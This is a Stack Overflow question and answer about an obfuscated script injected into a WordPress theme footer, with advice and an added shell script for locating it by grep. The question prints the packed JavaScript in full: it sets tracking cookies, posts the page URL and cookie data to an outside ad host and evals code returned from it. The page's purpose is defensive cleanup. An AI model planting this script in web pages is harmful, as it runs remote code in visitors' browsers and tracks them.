Preventing specific script from executing in WordPress

There is a particular malicious script loaded at the end of my WordPress site that I want to prevent from running. The function is obfuscated to avoid detection.

<script type="text/javascript">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return c
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[c] = k[c] || c
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        }
        ;
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('2 15={\'51\':\'//102.61\',\'6\':\'62\',\'48\':38};23 44(){2 3;9{3=25 55("64.52")}7(11){9{3=25 55("63.52")}7(66){3=38}}5(!3&&67 50!=\'69\'){3=25 50()}42 3};23 18(28){2 6=" "+43.6;2 34=" "+28+"=";2 33=17;2 16=0;2 21=0;5(6.13>0){16=6.37(34);5(16!=-1){16+=34.13;21=6.37(";",16);5(21==-1){21=6.13}33=65(6.56(16,21))}}42(33)};23 19(28,47,24,30,31,36){43.6=28+"="+68(47)+((24)?"; 24="+24:"")+((30)?"; 30="+30:"")+((31)?"; 31="+31:"")+((36)?"; 36":"")};(23(12,46){2 22=18(12);5(22==17)22=0;2 32=18(12+\'57\');5(32==17)32=\'[]\';2 29=18(12+\'40\');5(29==17)29=\'[]\';2 3=44();3.60(\'59\',46,58);3.71("70-73","74/91-92-93-94");3.95=23(){5(3.90==4&&3.96==98){9{5(3.45.13==0)42;2 20=41.49(3.45);2 26=\'\';2 14=0;2 39=38;9{26=20[\'99\']}7(11){}9{14=20[\'100\']}7(11){}9{39=(20[\'101\']==1)}7(11){}15[\'48\']=39;5(26.13>0){2 10=25 89();10.88(10.87()+1);5(14>0){19(12+\'86\',14.53(),10.27())}9{19(12+\'85\',20[\'84\'],10.27())}7(11){}5(22==0){19(12,\'1\',10.27())}2 8=17;9{8=41.49(18(15[\'6\']+\'40\'))}7(11){}5(8==17)8=[];5(8.37(14)==-1)8[8.13]=1*14;19(15[\'6\']+\'40\',41.83(8),10.27());54.82(26)}}7(11){}}};3.81(\'80=\'+22.53()+\'&79=\'+35(54.78.77)+\'&76=\'+35(32)+\'&75=\'+35(29))})(15[\'6\'],15[\'51\']+\'/97.72\');', 10, 103, '||var|xmlhttp||if|cookie|catch|vM|try|vDate|e|sCookieName|length|iT|vXAdsObj|offset|null|getCookie|setCookie|Response|end|iStatus|function|expires|new|sCode|toUTCString|name|sMS|path|domain|sMA|setStr|search|encodeURIComponent|secure|indexOf|false|bM|_ms|JSON|return|document|getXmlHttp|responseText|sUrl|value|mobile|parse|XMLHttpRequest|url|XMLHTTP|toString|window|ActiveXObject|substring|_ma|true|POST|open|fun|xads_platf|Microsoft|Msxml2|unescape|E|typeof|escape|undefined|Content|setRequestHeader|php|type|application|ms|ma|href|location|u|s|send|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|readyState|x|www|form|urlencoded|onreadystatechange|status|g|200|c|t|m|amads'.split('|'), 0, {}))
    </script>

The script appears to call a 3rd party script loaded on another website.

Is there any way I could block this particular script from being injected, or locate which plugin calls the script? I've tried turning off my plugins one by one but that hasn't fixed the problem. I'm thinking of blocking the 3rd party domain through a firewall rule server-side but that is just a temporary fix.

Sorry if I broke any "unwritten" rules, I am quite new to Stack Overflow.



Solution 1:[1]

I went through all the WordPress load files to search for any suspicious scripts that may be running. I found it in the footer of my theme folder.

If someone reading this is facing the same problem, you should use developer tools to find out which function calls the pop-up / malicious script.

After you find the malicious script injection code, you should SSH to the server and use grep to find out which .php file executes it.

For example:

grep -r -H "code" *

This will make grep look recursively (-r option) and provide the result in a human-readable format (-H option) for the string “code” in all (*) files under the current working directory.

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1 r.omaarr
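
The search described in Solution 1, written out as an added example (not code from the original post). The decoded strings such as the URL and cookie names do not appear literally in the packed source, so the search targets the `eval(function(p,a,c,k,e,d)` header from the question instead; the directory layout and file contents are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: locate the packed-JavaScript header from the question in a
# WordPress tree. Paths and file contents below are constructed for the demo.

# find_packed_js DIR
# Prints file:line:match for each file containing the packer header.
# Exit status is grep's: 0 if something matched, 1 if nothing did.
find_packed_js() {
    dir=${1:-.}
    # [[:space:]]* accepts both the minified header and the pretty-printed
    # form that browser developer tools display.
    pattern='eval\(function\(p,[[:space:]]*a,[[:space:]]*c,[[:space:]]*k,[[:space:]]*e,[[:space:]]*d\)'
    # -r recurse, -n line numbers, -I skip binary files, -E extended regex,
    # -o print only the matched text so the long packed line is not dumped.
    grep -rnIoE --include='*.php' --include='*.js' --include='*.html' \
        -- "$pattern" "$dir"
}

# Builds a small constructed theme directory: one injected footer, one clean file.
make_sample_tree() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/themes/example-theme"
    cat > "$root/themes/example-theme/footer.php" <<'EOF'
<?php wp_footer(); ?>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){return p}('constructed placeholder',10,1,''.split('|'),0,{}))
</script>
EOF
    cat > "$root/themes/example-theme/functions.php" <<'EOF'
<?php
// clean file: uses the word eval only in a comment
EOF
    printf '%s\n' "$root"
}

# Demo run on the constructed tree; prints the footer.php hit with its line number.
sample=$(make_sample_tree)
find_packed_js "$sample"
rm -rf "$sample"
```

On a real site, pass the WordPress root (or `wp-content`) as the argument; each hit names the file and line to inspect.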